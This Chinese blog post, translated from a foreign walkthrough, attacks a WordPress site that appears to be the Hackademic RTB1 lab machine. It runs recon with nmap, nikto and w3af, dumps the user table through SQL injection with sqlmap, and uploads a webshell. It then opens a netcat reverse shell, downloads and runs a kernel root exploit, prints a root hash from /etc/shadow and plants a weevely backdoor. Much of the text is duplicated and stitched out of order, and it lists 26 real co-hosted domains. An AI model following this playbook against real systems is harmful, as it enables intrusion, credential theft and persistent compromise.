[转国外]干掉一个wp站点
他站点(旁站:sameip.org):
Same IP 26 sites hosted on IP Address 173.236.138.113
![clip_image002[1]](http://img.cker.in/wp_90E7/clip_image0021_thumb.png "clip_image002[1]")
目标站点DNS记录信息:
RecordTypeTTLPriorityContenthack-test.comA4 hours173.236.138.113 ()hack-test.comSOA4 hoursns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400hack-test.comNS4 hoursns1.dreamhost.comhack-test.comNS4 hoursns3.dreamhost.comhack-test.comNS4 hoursns2.dreamhost.comwww.hack-test.comA4 hours173.236.138.113 ()
同时确认WEB服务的类型:
显而易见是Apache ,稍后我们将确定其版本:
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
现在是时候来查询目标站点持有人(也许可能就是管理员)信息了:
现在我们有了管理员的一些相关信息了,祭出Backtrack5中的神器 Whatweb 来确认操作系统和WEB服务版本信息:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
现在我们知道,目标站点使用了用PHP编写的非常出名的开源博客系统WordPress,并且是跑在Fedora的Linux发行版上的,Apache版本是2.2.15。接下来让我们看看目标站点服务器开了哪些端口:
祭出神器Nmap
1 – 获取目标服务器开放的服务
root@bt:/# nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.0013s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd 2.2.15 ((Fedora))MAC Address: 00:0C:29:01:8A:4D (VMware)Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – 获取目标服务器操作系统
root@bt:/# nmap -O hack-test.com Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.00079s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp closed ssh 80/tcp open httpMAC Address: 00:0C:29:01:8A:4D (VMware)Device type: general purposeRunning: Linux 2.6.XOS details: Linux 2.6.22 (Fedora Core 6)Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
啊哦!~只开了80,而且是 Fedora Core 6 Linux内核版本为2.6.22
现在我们已经收集了很多关于目标站点的重要信息了。让我们扫扫他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.)
让我们先试试 Nakto.pl 来扫扫,没准能搞出点漏洞来
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————
同时试试Wa3f(Ps:哦哇谱死的开源项目,很不错的说~)
root@bt:/pentest/web/w3af# ./w3af_gui Starting w3af, running on:Python version:2.6.5 (r265:79063, Apr 16 2010, 13:57:41)[GCC 4.4.3]GTK version: 2.20.1PyGTK version: 2.17.0 w3af - Web Application Attack and Audit FrameworkVersion: 1.2Revision: 4605Author: Andres Riancho and the w3af team.
图形界面的扫描方式,写入URL即可。
用以前给杂志社投稿的语气说,泡杯茶的功夫,等待扫描结束并查看结果。
你可以看到很多漏洞信息鸟~先试试SQL注入。
url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 然后 Exploit it!
发现其他漏洞测试失败,用SQLMap进行脱裤吧(猜解数据库并保存目标站点相关信息到本地) Dump it!
sqlmap -u url
过一小会儿能见到如下信息
按n并回车后你可以看到
哦也~显错方式的注入点,而且爆出的 Mysql的版本信息
用sqlmap取得所有库,参数 -dbs
找到三个库
查Wordpress的库中所有表,参数 -D wordpress -tables
然后是列名(这里需要你自己熟悉敏感信息存在哪个表中呢),参数 -T wp_users -columns
22个字段(列)
然后查数据,参数 -C user_login,user_pass –dump
然后解密管理员的hash,这里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php
明文密码是q1w2e3(和csdn库的密码排行榜有得一拼,哈哈~),然后登入后台拿webshell了。
Get in!~
来传个PHP的webshell吧~这里用的编辑插件拿shell的方法(见我以前写的tips,方法有很多哦~)
牛b。保存就可以了。然后访问就可以看到可爱的webshell了。
灰阔都知道,接下来要提权了。用反弹来获取一个交互式的shell。
本地用nc监听(不得不说经典就是经典啊~)
连上之后
输点Linux命令试试火候
id uid=48(apache) gid=489(apache) groups=489(apache)
pwd /var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
命令作用我就不翻译了。获取了内核版本,我们可以到 exploit-db.com 来寻找相关的exp进行权限的提升。
老外都是用wget下载的,国内灰阔们呢?
wget http://www.exploit-db.com/download/15285 -O roro.c--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 301 Moved PermanentlyLocation: http://www.exploit-db.com/download/15285/ [following]--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 7154 (7.0K) [application/txt]Saving to: `roro.c' 0K ...... 100% 29.7K=0.2s
代码我不贴了。用gcc编译exp gcc roro.c -o roro ,编译并且执行exp。
./roro [*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Triggering payload...[*] Restoring function pointer...
淡定,敲个id试试,你可以发现 root it!
现在可以查看shadow和passwd了~(我只截了部分)
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
我们可以使用 John the ripper 来破哈希。但是我们不会这么做,通常我们会留下一个后门(权限巩固),这样就可以随时涂掉他首页了(hv a joke.)。
我们用bt5中的weevely来上传一个带密码保护的PHP的webshell。
1 – weevely的相关选项
root@bt:/pentest/backdoors/web/weevely# ./main.py - Weevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/ Usage: main.py [options] Options:-h, --help show this help message and exit-g, --generate Generate backdoor crypted code, requires -o and -p .-o OUTPUT, --output=OUTPUTOutput filename for generated backdoor .-c COMMAND, --command=COMMANDExecute a single command and exit, requires -u and -p.-t, --terminal Start a terminal-like session, requires -u and -p .-C CLUSTER, --cluster=CLUSTERStart in cluster mode reading items from the givefile, in the form 'label,url,password' where label isoptional.-p PASSWORD, --password=PASSWORDPassword of the encrypted backdoor . -u URL, --url=URL Remote backdoor URL .
2 – 用它来创建一个PHP的webshell
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko Weevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/ + Backdoor file 'hax.php' created with password 'koko'.
3 – 上传
我们现在可以用weevely连接并操控他了。
测试(其实就相当于一句话马差不多的..)
总结:
老外的行文方式还不错,很好的渗透流程,很标准的科普文~~
Same IP 26 sites hosted on IP Address 173.236.138.113
IDDomainSite Link1
hijackthisforum.comhijackthisforum.com2sportforum.netsportforum.net3freeonlinesudoku.netfreeonlinesudoku.net4cosplayhell.comcosplayhell.com5videogamenews.orgvideogamenews.org6gametour.comgametour.com7qualitypetsitting.netqualitypetsitting.net8brendanichols.combrendanichols.com98ez.com8ez.com10hack-test.comhack-test.com11kisax.comkisax.com12paisans.compaisans.com13mghz.commghz.com14debateful.comdebateful.com15jazzygoodtimes.comjazzygoodtimes.com16fruny.comfruny.com17vbum.comvbum.com18wuckie.comwuckie.com19force5inc.comforce5inc.com20virushero.comvirushero.com21twincitiesbusinesspeernetwork.comtwincitiesbusinesspeernetwork.com22jennieko.comjennieko.com23davereedy.comdavereedy.com24joygarrido.comjoygarrido.com25prismapp.comprismapp.com26utiligolf.comutiligolf.com总计有26个站点在[173.236.138.113]这台服务器上。为了黑掉目标站点,许多黑客会把目标站点同服的其他站点也划入攻击范围内。但是出于学习的目的,我们今天暂且将其他站点放在一边。 我们需要更多关于目标站点的信息(Ps:笔者认为在渗透测试过程中,这比实施测试的环节来得重要得多。),他们包括: 1.DNS记录(A,NS,TXT,MX) 2.WEB服务类型(IIS,APACHE,TOMCAT) 3.域名注册者的信息(所持有域名公司等) 4.目标站点管理员(相关人员)的姓名,电话,邮箱和住址等 5.目标站点所支持的脚本类型(PHP,ASP,JSP,ASP.net,CFM) 6.目标站点的操作系统(UNIX,LINUX,WINDOWS,SOLARIS) 7.目标站点开放的端口 让我们先来查询相关DNS记录吧,这里用的是 who.is:
![clip_image002[1]](http://img.cker.in/wp_90E7/clip_image0021.png "clip_image002[1]")
目标站点DNS记录信息:
RecordTypeTTLPriorityContenthack-test.comA4 hours173.236.138.113 ()hack-test.comSOA4 hoursns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400hack-test.comNS4 hoursns1.dreamhost.comhack-test.comNS4 hoursns3.dreamhost.comhack-test.comNS4 hoursns2.dreamhost.comwww.hack-test.comA4 hours173.236.138.113 ()
同时确认WEB服务的类型:
显而易见是Apache ,稍后我们将确定其版本:
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
现在是时候来查询目标站点持有人(也许可能就是管理员)信息了:
现在我们有了管理员的一些相关信息了,祭出Backtrack5中的神器 Whatweb 来确认操作系统和WEB服务版本信息:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
现在我们知道,目标站点使用了用PHP编写的非常出名的开源博客系统WordPress,并且是跑在Fedora的Linux发行版上的,Apache版本是2.2.15。接下来让我们看看目标站点服务器开了哪些端口:
祭出神器Nmap
1 – 获取目标服务器开放的服务
root@bt:/# nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.0013s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd 2.2.15 ((Fedora))MAC Address: 00:0C:29:01:8A:4D (VMware)Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – 获取目标服务器操作系统
root@bt:/# nmap -O hack-test.com Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.00079s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp closed ssh 80/tcp open httpMAC Address: 00:0C:29:01:8A:4D (VMware)Device type: general purposeRunning: Linux 2.6.XOS details: Linux 2.6.22 (Fedora Core 6)Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
啊哦!~只开了80,而且是 Fedora Core 6 Linux内核版本为2.6.22
现在我们已经收集了很多关于目标站点的重要信息了。让我们扫扫他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.)
让我们先试试 Nakto.pl 来扫扫,没准能搞出点漏洞来
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————
同时试试Wa3f(Ps:哦哇谱死的开源项目,很不错的说~)
root@bt:/pentest/web/w3af# ./w3af_gui Starting w3af, running on:Python version:2.6.5 (r265:79063, Apr 16 2010, 13:57:41)[GCC 4.4.3]GTK version: 2.20.1PyGTK version: 2.17.0 w3af - Web Application Attack and Audit FrameworkVersion: 1.2Revision: 4605Author: Andres Riancho and the w3af team.
图形界面的扫描方式,写入URL即可。
用以前给杂志社投稿的语气说,泡杯茶的功夫,等待扫描结束并查看结果。
你可以看到很多漏洞信息鸟~先试试SQL注入。
url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 然后 Exploit it!
发现其他漏洞测试失败,用SQLMap进行脱裤吧(猜解数据库并保存目标站点相关信息到本地) Dump it!
sqlmap -u url
过一小会儿能见到如下信息
按n并回车后你可以看到
哦也~显错方式的注入点,而且爆出的 Mysql的版本信息
用sqlmap取得所有库,参数 -dbs
找到三个库
查Wordpress的库中所有表,参数 -D wordpress -tables
然后是列名(这里需要你自己熟悉敏感信息存在哪个表中呢),参数 -T wp_users -columns
22个字段(列)
然后查数据,参数 -C user_login,user_pass –dump
然后解密管理员的hash,这里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php
明文密码是q1w2e3(和csdn库的密码排行榜有得一拼,哈哈~),然后登入后台拿webshell了。
Get in!~
来传个PHP的webshell吧~这里用的编辑插件拿shell的方法(见我以前写的tips,方法有很多哦~)
牛b。保存就可以了。然后访问就可以看到可爱的webshell了。
灰阔都知道,接下来要提权了。用反弹来获取一个交互式的shell。
本地用nc监听(不得不说经典就是经典啊~)
连上之后
输点Linux命令试试火候
id uid=48(apache) gid=489(apache) groups=489(apache)
pwd /var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
命令作用我就不翻译了。获取了内核版本,我们可以到 exploit-db.com 来寻找相关的exp进行权限的提升。
老外都是用wget下载的,国内灰阔们呢?
wget http://www.exploit-db.com/download/15285 -O roro.c--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 301 Moved PermanentlyLocation: http://www.exploit-db.com/download/15285/ [following]--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 7154 (7.0K) [application/txt]Saving to: `roro.c' 0K ...... 100% 29.7K=0.2s
代码我不贴了。用gcc编译exp gcc roro.c -o roro ,编译并且执行exp。
./roro [*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Triggering payload...[*] Restoring function pointer...
淡定,敲个id试试,你可以发现 root it!
现在可以查看shadow和passwd了~(我只截了部分)
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
我们可以使用 John the ripper 来破哈希。但是我们不会这么做,通常我们会留下一个后门(权限巩固),这样就可以随时涂掉他首页了(hv a joke.)。
我们用bt5中的weevely来上传一个带密码保护的PHP的webshell。
1 – weevely的相关选项
root@bt:/pentest/backdoors/web/weevely# ./main.py - Weevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/ Usage: main.py [options] Options:-h, --help show this help message and exit-g, --generate Generate backdoor crypted code, requires -o and -p .-o OUTPUT, --output=OUTPUTOutput filename for generated backdoor .-c COMMAND, --command=COMMANDExecute a single command and exit, requires -u and -p.-t, --terminal Start a terminal-like session, requires -u and -p .-C CLUSTER, --cluster=CLUSTERStart in cluster mode reading items from the givefile, in the form 'label,url,password' where label isoptional.-p PASSWORD, --password=PASSWORDPassword of the encrypted backdoor . -u URL, --url=URL Remote backdoor URL .
2 – 用它来创建一个PHP的webshell
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko Weevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/ + Backdoor file 'hax.php' created with password 'koko'.
3 – 上传
我们现在可以用weevely连接并操控他了。
测试(其实就相当于一句话马差不多的..)
总结:
老外的行文方式还不错,很好的渗透流程,很标准的科普文~~